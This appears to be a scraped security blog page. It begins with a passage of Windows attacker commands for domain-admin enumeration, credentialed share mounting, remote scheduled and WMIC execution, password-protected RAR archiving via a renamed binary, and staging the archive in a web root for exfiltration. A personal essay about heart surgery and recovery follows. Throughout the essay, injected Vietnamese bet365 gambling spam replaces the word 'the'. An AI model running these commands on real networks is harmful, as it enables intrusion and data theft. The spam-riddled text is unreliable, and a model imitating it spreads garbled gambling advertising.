net group "enterprise admins" /domain >>c:\windows\system32\b.txt
 
======= Mount share and copy batch script ========
nbtstat -a x.x.x.x >>c:\temp\a.txt
net use \\x.x.x.x password user:domain/user
net use Z: \\x.x.x.x\c$ password /user:domain\user
copy C:\temp\*.bat Z:\windows\system32\
dir Z:\windows\system32\*.bat
 
====== Schedule at job, execute script, copy results back, delete share ========
net time \\x.x.x.x
at \\x.x.x.x
at \\x.x.x.x 4:01 "C:\windows\system32\b.bat"
net time /domain
tasklist
dir Z:\windows\system32\b.txt
copy Z:\windows\system32\b.txt C:\temp\b.txt
at \\x.x.x.x 1 /delete /y
net use Z: /delete /y
 
========== abc.bat ===========
@echo off
c:\temp\cmd.exe a -hppassword c:\temp\abc.temp c:\data\for\exfil -x*.exe -x*.dll
 Note: cmd.exe is a renamed copy of rar.exe
=========== Create and move exfil =============
copy c:\temp\abc.bat \\x.x.x.x\c$\temp\abc.bat
copy c:\temp\cmd.exe \\x.x.x.x\c$\temp\cmd.exe
wmic /node:"x.x.x.x" /user:"domain\username" /password:"password" process call create "cmd.exe /c c:\temp\abc.bat"
copy \\x.x.x.x\c$\temp\abc.temp c:\temp\abc.temp
copy c:\temp\abc.temp \\x.x.x.x\c$\inetpub\wwwroot\website\abc.temp

Monday, January 1, 2018

My 2017

This will be kind of a different post for me in that I won’t be talking about DFIR or hunting.  As many of you know I’ve had kind of a challenging year both physically and mentally so I want to reflect on some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things I’ve experienced, learned and overcame during cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 course of 2017.

In April of 2017 I was sitting at my desk, working, when I began having horrible pains in my chest, down cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 arteries in my neck as well as my arm.  I told my wife to call 911 because I thought I was having a heart attack.  When cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 EMT’s arrived my pain had already subsided, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y went ahead and took me to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hospital where I spent cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next several hours waiting for tests to be ran and results to come back.  The end result was that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y didn’t find any signs of a heart attack, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y admitted me so that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y could perform additional tests.  The following day I had a stress test which also came back normal. With nothing to go on, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 doctors sent me home without a definitive answer as to what had happened.  I should have probably pushed harder for an answer, but I think I was just relieved that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y didn't find anything serious.

Over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next few days those same pains would come back.  I couldn’t associate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m with any specific activity or food that I ate, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y would just appear and literally put me on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 floor a couple of times.  I refused to go back to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hospital for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m to keep me overnight and eventually tell me that nothing was wrong, but agreed to my wife’s pleading that I call cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cardiologist.  My cardiologist scheduled me for a heart cacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365terization, which I had a few days later.  The results of that test was a little more bleak, in that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y had identified multiple blockages with no option for stents.  The pain was attributed to unstable angina and that I needed to have bypass surgery.  When I asked why cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stress test didn’t find anything I was told that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 test tries to identify anomalous blood flow in different portions of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 heart.  All of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 blood flow in my heart was abnormal, so it looked normal on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 test.  Anomaly detection failed to find what it should have… that’s just crazy!!!

The following morning I was taken in for surgery, which lasted several hours.  I remember saying goodby to my wife and being wheeled into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 operating room.  The next thing I remember was waking up cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following day on a breathing machine (not a good feeling) with ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r tubes and wires going in and out of my chest and abdomen.  I eventually spent cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next week in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hospital.  The first night that I was conscious I was scared to fall asleep because I didn’t think I was going to wake up.  I wound up staying awake that entire night.  Watching cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 machines that I was connected to.  Watching cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 nurses walk by.  Listening to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sounds of a hospital.  It was a long night and I thought a lot about my family.  I thought about how, given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chance, things would be different and vowed to make some changes in my life. 

Over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next few days I was able to become a little more active and even more so every day that went by.  When I was released from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hospital I was able to stand up from a chair and walk a few hundred feet on my own.  After I returned home, every day I kept pushing myself physically.  I would have my wife take me to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local shopping mall so I could walk.  I was a mall walker and probably cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 slowest one at that, but that was ok.  At least was able to get out and start to take control of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things that I was able to.  Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r things that I needed to take control of were cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 main contributors to my situation.  Smoking, diet and weight.

I felt that if I continued to exercise I would only have to start eating better to get my weight under control.  Better diet to me meant cutting out sodium as much as possible and limiting saturated fat intake.  This was all a good start and definitely something that I needed to do, but I wasn’t losing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weight that I thought I should be.  I cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n began to count calories and really focus on portion control.  This is when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weight really started to come off, but it also had me feeling hungry all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time.  I guess nobody ever said that it was going to be easy and I actually thought that quitting smoking was easier than changing and limiting my diet.  But as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pounds started to come off, my motivation to keep going grew stronger.  In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 long run it was well worth cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 effort.

Healing seemed slow and very painful.  I needed help trying to sit up after laying down or trying to pick up anything with more than a few pounds of weight.  I knew that it would take time and that I would eventually get over it, but that feeling of being helpless was very frustrating.  There were also side effects of being on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 heart lung machine that I don’t think I will every recover from.  One being my eyesight which has dramatically changed, anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r being my ability to concentrate over longer periods of time, and anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r being forgetfulness, but that’s ok because it’s much better than cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 alternative. 

It's been several months now since my surgery.  I’ve lost all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 weight that I needed to or feel like I should have.  I continue eating healthy which has cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 side effect of my family eating much healthier.  I spend an hour on cardio as well as lift weights 6 days a week.  I feel so much better than I have in a very very long time.  This journey has taught me so much about myself and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things that are truly important.  For me cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se things are:
  1. Myself
  2. My health
  3. My family
  4. My friends

I’ve also learned that It’s never too late to take control of those things that are holding you back or adversely affecting your life.  A little focus, persistence and patience can go a long way when you are trying to reach a goal!  


2017 is a year that I am glad is over. I do look forward to 2018 and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things that this year will bring (I just hope cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are non life changing 😃)
Before

After